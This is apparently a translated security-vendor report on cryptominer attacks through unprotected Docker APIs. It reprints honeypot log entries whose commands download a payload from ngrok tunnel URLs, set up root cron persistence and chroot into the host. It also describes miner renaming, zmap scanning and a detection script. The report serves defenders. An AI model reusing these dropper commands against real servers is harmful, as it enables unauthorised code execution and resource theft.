How unprotected Docker APIs and community-published public images are used to distribute cryptocurrency miners

We analyzed the data collected by honeypot containers, which we set up to monitor threats, and found extensive activity from unwanted or unauthorized cryptocurrency miners being deployed as rogue containers using Docker Hub images published by the community. These images are used as part of a service that delivers cryptocurrency-mining malware.

In addition, network tooling is installed to penetrate neighboring containers and applications.

We left our honeypots as they were, with default settings and no additional security measures or software installed afterwards. Note that Docker publishes initial setup recommendations for avoiding errors and simple vulnerabilities. However, the honeypots we use are containers designed to detect attacks on the containerization platform, not on the applications inside the containers.

The malicious activity observed is also notable because it requires no vulnerability and does not depend on the Docker version. Finding a misconfigured, and therefore exposed, container image is all attackers need to infect many exposed servers.

An unprotected Docker API allows the caller to perform a wide range of commands, including listing running containers, retrieving the logs of a specific container, starting and stopping containers (including forced stops), and even creating a new container from a specific image with specific settings.

Figure: on the left, the malware delivery method; on the right, the attacker's environment, which allows remote image deployment.

Figure: distribution of 3762 public Docker APIs by country, according to a Shodan search as of February 12, 2019.

Attack chain and payload variants

Honeypots are not the only way to detect malicious activity. Shodan data shows that the number of exposed Docker APIs (see the second chart) has grown since we investigated a misconfigured container used as a bridge for deploying Monero mining software. Last October (2018, the latest data available at the time; translator's note) there were only 856 open APIs.

Analysis of the honeypot logs showed that the use of container images was also associated with the use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example, localhost). This allows attackers to create URLs dynamically when delivering payloads to an open server. Below are code samples from the logs showing the abuse of the ngrok service:

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the uploaded files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payloads cannot be downloaded once they expire.
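The entries above combine three behaviours a defender can key on: a download from a throwaway ngrok tunnel, a cron entry written under some root prefix, and a chroot into that prefix. The following Python check is an added example, not code from the article or from Trend Micro; the records are constructed to mirror the log entries above, and the rule names are my own labels.

```python
import re

# Constructed records mirroring the honeypot entries above: Docker API
# container-create requests with a shell Entrypoint and a one-line Cmd.
# URLs stay defanged (hxxp, [.]) exactly as the article shows them.
SAMPLE_CREATES = [
    {"Entrypoint": "/bin/sh",
     "Cmd": '-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d '
            '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";'
            'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;'
            'chroot /tmp9bedce sh -c "cron || crond"'},
    # Benign control record: a shell Entrypoint on its own is not suspicious.
    {"Entrypoint": "/bin/sh", "Cmd": "-c echo hello"},
]

# Rule names are my own labels for the three behaviours the entries combine.
RULES = [
    # curl/wget fetching from an ngrok tunnel, defanged or not
    ("tunnel_download", re.compile(r"\b(curl|wget)\b[^;|&]*ngrok\[?\.\]?io")),
    # redirecting output into a crontab or cron.d file under any root prefix
    ("cron_persistence", re.compile(r">\s*/\S*/etc/(crontab|cron\.d/)")),
    # chroot into a directory of the container, as every entry above does
    ("chroot_exec", re.compile(r"\bchroot\s+/\S+")),
]


def inspect_create(record):
    """Return the names of rules matched by one container-create record."""
    cmd = record.get("Cmd") or record.get("Command") or ""
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(records):
    """Pair the index of each suspicious record with its matched rules."""
    hits = []
    for idx, rec in enumerate(records):
        matched = inspect_create(rec)
        if matched:
            hits.append((idx, matched))
    return hits


if __name__ == "__main__":
    for idx, matched in triage(SAMPLE_CREATES):
        print(f"record {idx}: {', '.join(matched)}")
```

Any one rule on its own produces noise; the combination is what distinguishes these entries from ordinary container launches.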

There are two payload variants. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO), which connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools used to scan network ranges and then search for new targets.

The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are located, and the RIP variable is the file name (in fact a hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to make sure that no other cryptocurrency miners are running on the attacked server.

Figure: examples of the HOST and RIP variables, together with a snippet of the code used to check that no other miners are running.

Before the miner is launched, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that may be present in Linux environments. This is usually enough to bypass checks against the list of running processes.

The scanning script has its own distinctive features. It uses the same URL service to deploy the tools it needs. Among these is the zmap binary, used to scan networks and obtain a list of open ports. The script also downloads another binary used to interact with the discovered services and grab their banners in order to determine additional information about each discovered service (such as its version).

The script also predefines some network ranges to scan, although this depends on the script version. It also specifies the target ports of the services, in this case Docker, before running the scan.

Once potential targets are found, banners are grabbed from them automatically. The script also filters targets by the services, applications, components or platforms it is interested in: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker client 1.16, and Apache CouchDB. If a scanned server matches one of these, it is saved to a text file, which the attackers can later use for further analysis and compromise. These text files are uploaded to the attackers' servers via dynamic links. That is, each file has a separate URL, which makes subsequent access difficult.

The attack vector used is a Docker image, as can be seen in the two code snippets below.

Figure: above, the renaming to a legitimate service; below, how zmap is used to scan networks.

Figure: at the top, the predefined network ranges; at the bottom, the specific ports used for service discovery, including Docker.

Figure: the chart shows that the alpine-curl image has been downloaded more than 10 million times.

A Docker image can be built on top of Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols. As you can see in the previous chart, this image has already been downloaded more than 10 million times. Such a high download count may indicate that this image is used as an entry point; this image was updated more than a month ago; other images in this repository have not been downloaded as often. In Docker, an entry point is a set of instructions used to configure a container to run. If the entry point is misconfigured (for example, the container is left exposed to the internet), the image can be used as an attack vector. Attackers can use it to deliver payloads if they find an unsupported, misconfigured, or exposed container.

It is important to note that this image (alpine-curl) is not malicious in itself, but as shown above, it can be used to perform malicious tasks. Similar Docker images can also be used for malicious purposes. We have contacted Docker and are working with them on this issue.

Recommendations

Misconfiguration remains a constant problem for many companies, especially those practicing DevOps, which focuses on fast development and delivery. This is compounded by the need to comply with audit and monitoring rules, the need to maintain data confidentiality, and the enormous cost of non-compliance. Integrating security automation into the development lifecycle not only helps identify security gaps that would otherwise go unnoticed, but also reduces unnecessary work, such as running additional software for every vulnerability or misconfiguration found after the application has been deployed.

The incident discussed in this article shows the need to address security from the very start, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure they are configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service), and encrypt network connections.
  • Follow the recommendations and enable the security mechanisms, such as those provided by Docker, and turn on built-in security features.
  • Use automated scanning of runtimes and images to obtain additional information about the processes running in a container (for example, to detect spoofing or to search for vulnerabilities). Application control and integrity monitoring help detect abnormal changes on servers, in files, and in system areas.

Trend Micro helps DevOps teams build securely, ship fast, and run anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined, and automated security across the organization's DevOps pipeline and delivers multiple XGen threat defense techniques to protect physical, virtual, and cloud workloads at runtime. It also adds container protection with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, the speakers discuss the changes that should be made in advance to reduce the likelihood of, or avoid altogether, the situation described above. And on August 19-21, at the online intensive DevOps Tools & Cheats, you can discuss these and similar security issues with colleagues and practicing instructors at a round table, where everyone can share their thoughts and hear about the pains and successes of more experienced colleagues.

Source: www.hab.com
